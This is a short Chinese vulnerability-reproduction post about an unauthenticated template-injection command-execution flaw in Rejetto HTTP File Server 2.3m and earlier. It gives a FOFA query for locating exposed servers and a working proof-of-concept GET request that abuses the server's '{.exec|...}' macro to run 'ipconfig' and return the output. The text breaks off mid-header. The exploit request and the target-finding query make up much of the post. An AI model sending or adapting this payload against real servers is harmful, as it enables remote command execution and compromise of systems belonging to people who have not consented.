0x01 产品简介

Rejetto HTTP File Server（HFS）是一个基于HTTP协议的文件服务器软件，旨在为用户提供简单、轻量级且易于使用的文件共享解决方案。功能强大、易于使用的文件服务器软件，无论是个人使用还是团队协作，HFS都能满足用户的需求，提高工作效率。

0x02 漏洞概述

Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞，该漏洞源于存在模板注入漏洞。  成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

0x03 影响范围

Rejetto HTTP File Server <= 2.3m

0x04 复现环境

FOFA：app="HFS"

0x05 漏洞复现

PoC

GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=